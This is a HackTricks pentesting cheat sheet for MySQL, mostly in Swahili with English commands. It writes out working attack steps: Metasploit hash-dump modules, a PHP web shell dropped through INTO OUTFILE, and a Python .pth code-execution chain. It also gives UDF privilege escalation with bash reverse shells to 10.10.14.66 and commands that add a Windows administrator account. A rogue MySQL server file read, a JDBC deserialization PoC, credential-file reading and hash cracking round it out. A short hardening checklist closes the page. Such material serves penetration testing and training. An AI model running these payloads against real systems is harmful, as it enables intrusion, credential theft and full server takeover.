HackTricks3306 - Pentesting Mysql
Reading time: 17 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Maelezo ya Msingi
MySQL inaweza kuelezewa kama mfumo wa chanzo wazi wa Relational Database Management System (RDBMS) unaopatikana bila malipo. Inatumia Structured Query Language (SQL), ikiruhusu usimamizi na uendeshaji wa hifadhidata.
Bandari ya chaguo-msingi: 3306
3306/tcp open mysql
Kuunganisha
Ndani
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
Mbali
mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost
External Enumeration
Baadhi ya vitendo vya enumeration vinahitaji credentials halali
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds
Brute force
Andika data yoyote ya binary
CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)
Amri za MySQL
show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;
select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name
#Get a shell with the mysql client user
\! sh
#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"
#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'
#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'
Kuorodhesha Ruhusa za MySQL
#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();
# Get users, permissions & hashes
SELECT * FROM mysql.user;
#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';
# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';
Unaweza kuona katika nyaraka maana ya kila privilege: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html
MySQL File RCE
INTO OUTFILE → Python .pth RCE (hook za usanidi maalum za tovuti)
Kwa kutumia mbinu ya kawaida ya INTO OUTFILE inawezekana kupata arbitrary code execution kwenye malengo ambayo baadaye yanaendesha Python scripts.
- Tumia
INTO OUTFILEkuandika faili maalum.pthndani ya direktori yoyote inayopakiwa kiotomatiki nasite.py(kwa mfano.../lib/python3.10/site-packages/). - Faili
.pthinaweza kuwa na mstari mmoja unaoanza naimportukifuatiwa na arbitrary Python code ambayo itaendeshwa kila wakati interpreter inapoanza. - Wakati interpreter inapoendeshwa kwa njia isiyoonekana na CGI script (kwa mfano
/cgi-bin/ml-draw.pyyenye shebang#!/bin/python) payload itatekelezwa kwa vibali sawa na mchakato wa web-server (FortiWeb iliiendesha kama root → full pre-auth RCE).
Example .pth payload (single line, no spaces can be included in the final SQL payload, so hex/UNHEX() or string concatenation may be required):
import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)
Mfano wa kutengeneza faili kupitia ombi la UNION (alama za nafasi zilibadilishwa na /**/ ili kupita kichujio cha nafasi cha sscanf("%128s") na kudumisha jumla ya urefu ≤128 bytes):
'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'
Vizuizi muhimu & njia za kuepuka:
INTO OUTFILEhaiwezi kuandika juu ya faili zilizopo; chagua jina jipya la faili.- Njia ya faili inatatuliwa relative to MySQL’s CWD, kwa hivyo kuweka
../../mwanzoni husaidia kufupisha njia na kuepuka vikwazo vya absolute-path. - Ikiwa input ya mshambulizi imetolewa kwa
%128s(au sawa) nafasi yoyote itakata payload; tumia mfululizo wa comment za MySQL/**/au/*!*/kubadilisha nafasi. - Mtumiaji wa MySQL anayetekeleza query anahitaji ruhusa ya
FILE, lakini katika appliances nyingi (mfano FortiWeb) service inaendeshwa kama root, ikitoa ufikiaji wa kuandika karibu kila mahali.
Baada ya kuangusha .pth, omba tu CGI yoyote inayosimamiwa na interpreter ya python ili kupata code execution:
GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>
Mchakato wa Python uta-import .pth yenye madhara kiotomatiki na uta-execute shell payload.
# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)
MySQL arbitrary read file by client
Kwa kweli, unapojaribu load data local into a table server ya MySQL au MariaDB inaomba client to read it na kutuma content of a file. Then, if you can tamper a mysql client to connect to your own MySQL server, you can read arbitrary files.
Tafadhali kumbuka kwamba hili ndilo tabia linapotumika:
load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
(Kumbuka neno "local")
Kwa sababu bila "local" unaweza kupata:
mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
PoC ya awali: https://github.com/allyshka/Rogue-MySql-Server
Kwenye karatasi hii unaweza kuona maelezo kamili ya shambulio na hata jinsi ya kulipanua hadi RCE: https://paper.seebug.org/1113/
Hapa unaweza kupata muhtasari wa shambulio: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/
POST
Mysql User
Itakuwa ya kuvutia sana ikiwa mysql inaendesha kama root:
cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1
Mipangilio Hatari ya mysqld.cnf
Katika usanidi wa huduma za MySQL, mipangilio mbalimbali hutumika kuweka jinsi inavyofanya kazi na hatua za usalama:
- The
usersetting is utilized for designating the user under which the MySQL service will be executed. passwordis applied for establishing the password associated with the MySQL user.admin_addressspecifies the IP address that listens for TCP/IP connections on the administrative network interface.- The
debugvariable is indicative of the present debugging configurations, including sensitive information within logs. sql_warningsmanages whether information strings are generated for single-row INSERT statements when warnings emerge, containing sensitive data within logs.- With
secure_file_priv, the scope of data import and export operations is constrained to enhance security.
Privilege escalation
# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;
# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"
# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh
Privilege Escalation via library
Ikiwa mysql server is running as root (au user mwingine mwenye ruhusa zaidi) unaweza kuifanya itekeleze amri. Kwa hiyo, unahitaji kutumia user defined functions. Na ili kuunda user defined utahitaji library kwa OS inayomkimbia mysql.
Library hasidi ya kutumia inaweza kupatikana ndani ya sqlmap na metasploit kwa kufanya locate "*lib_mysqludf_sys*". Faili za .so ni maktaba za linux na .dll ni za Windows, chagua ile unayohitaji.
Kama huna libraries hizo, unaweza ama kutafuta hizo, au kupakua hii linux C code na kucompile ndani ya mashine ya linux iliyo dhaifu:
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
Sasa baada ya kuwa na maktaba, ingia ndani ya Mysql kama mtumiaji mwenye ruhusa za juu (root?) na fuata hatua zinazofuata:
Linux
# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');
Windows
# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
Windows tip: create directories with NTFS ADS from SQL
Kwenye NTFS unaweza kulazimisha uundaji wa saraka kwa kutumia alternate data stream hata pale ambapo kuna primitive ya kuandika faili pekee. Ikiwa classic UDF chain inatarajia saraka ya plugin lakini haipo na @@plugin_dir haijulikani au imefungwa, unaweza kuunda kwanza kwa ::$INDEX_ALLOCATION:
SELECT 1 INTO OUTFILE 'C:\\MySQL\\lib\\plugin::$INDEX_ALLOCATION';
-- After this, `C:\\MySQL\\lib\\plugin` exists as a directory
Hii inabadilisha SELECT ... INTO OUTFILE iliyo na mipaka kuwa primitive kamili zaidi kwenye Windows stacks kwa kuanzisha muundo wa folda unaohitajika kwa UDF drops.
Kutoa taarifa za kuingia za MySQL kutoka kwenye faili
Ndani ya /etc/mysql/debian.cnf unaweza kupata nenosiri kwa maandishi wazi la mtumiaji debian-sys-maint
cat /etc/mysql/debian.cnf
Unaweza kutumia credentials hizi kuingia kwenye mysql database.
Ndani ya faili: /var/lib/mysql/mysql/user.MYD unaweza kupata all the hashes of the MySQL users (ambazo unaweza extract kutoka mysql.user ndani ya database).
Unaweza extract hizo kwa kufanya:
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
Kuwezesha uandishi wa logi
Unaweza kuwezesha uandishi wa logi za maswali za mysql ndani ya /etc/mysql/my.cnf kwa kuondoa alama za kusimamishwa (uncomment) kwenye mistari ifuatayo:
.png)
Mafaili muhimu
Mafaili ya usanidi
- windows *
- config.ini
- my.ini
- windows\my.ini
- winnt\my.ini
- <InstDir>/mysql/data/
- unix
- my.cnf
- /etc/my.cnf
- /etc/mysql/my.cnf
- /var/lib/mysql/my.cnf
- ~/.my.cnf
- /etc/my.cnf
- Historia ya amri
- ~/.mysql.history
- Mafaili ya logi
- connections.log
- update.log
- common.log
Default MySQL Database/Tables
ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS
Amri za Kiotomatiki za HackTricks
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html
Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
2023-2025 Mambo Muhimu (vipya)
JDBC propertiesTransform deserialization (CVE-2023-21971)
Kutoka Connector/J <= 8.0.32 attacker ambaye anaweza kuathiri JDBC URL (kwa mfano katika third-party software inayouliza connection string) anaweza kuomba arbitrary classes zipakwe upande wa client kupitia parameter ya propertiesTransform. Ikiwa gadget iliyopo kwenye class-path inaweza kupakiwa, hii husababisha remote code execution in the context of the JDBC client (pre-auth, kwa sababu hakuna valid credentials zinahitajika). PoC ndogo inavyoonekana:
jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil
Kukimbiza Evil.class kunaweza kuwa rahisi—kama kuifanya ionekane kwenye class-path ya application iliyo na udhaifu, au kuruhusu rogue MySQL server kutuma serialized object yenye madhara. Tatizo limerekebishwa katika Connector/J 8.0.33 – sasisha driver au kwa uwazi weka propertiesTransform kwenye allow-list.
(Tazama Snyk write-up kwa maelezo)
Rogue / Fake MySQL server attacks against JDBC clients
Vyombo kadhaa vya open-source vinatekeleza partial MySQL protocol ili kushambulia JDBC clients zinazoungana nje:
- mysql-fake-server (Java, inasaidia file read na deserialization exploits)
- rogue_mysql_server (Python, uwezo sawa)
Njia za kawaida za shambulio:
- Programu ya mwathiriwa inapakia
mysql-connector-jikiwa imewekwaallowLoadLocalInfile=trueauautoDeserialize=true. - Mshambuliaji anadhibiti DNS / host entry ili hostname ya DB irejelee kwa mashine iliyoko chini ya udhibiti wao.
- Server yenye madhara inajibu na packets zilizotengenezwa ambazo zinaanzisha ama
LOCAL INFILEarbitrary file read au Java deserialization → RCE.
Mfano wa amri ya mstari mmoja kuanzisha fake server (Java):
java -jar fake-mysql-cli.jar -p 3306 # from 4ra1n/mysql-fake-server
Kisha elekeza victim application kwa jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true na usome /etc/passwd kwa kuandika jina la faili kwa base64 kwenye uwanja wa username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).
Kuvunja caching_sha2_password hashi
MySQL ≥ 8.0 huhifadhi hashi za nywila kama $mysql-sha2$ (SHA-256). Zote mbili Hashcat (mode 21100) na John-the-Ripper (--format=mysql-sha2) zinaunga mkono kuvunja offline tangu 2023. Toa kolamu ya authentication_string na uipe moja kwa moja:
# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist
Orodha ya kuimarisha usalama (2025)
• Set LOCAL_INFILE=0 and --secure-file-priv=/var/empty ili kuondoa primitives nyingi za kusoma/kuandika faili.
• Ondoa ruhusa ya FILE kutoka kwa akaunti za programu.
• Kwenye Connector/J weka allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (tupu).
• Zima plugins za uthibitishaji zisizotumika na lazimisha TLS (require_secure_transport = ON).
• Fuatilia CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL na amri ghafla za SET GLOBAL.
References
-
Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)
-
mysql-fake-server – Rogue MySQL server for JDBC client attacks
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.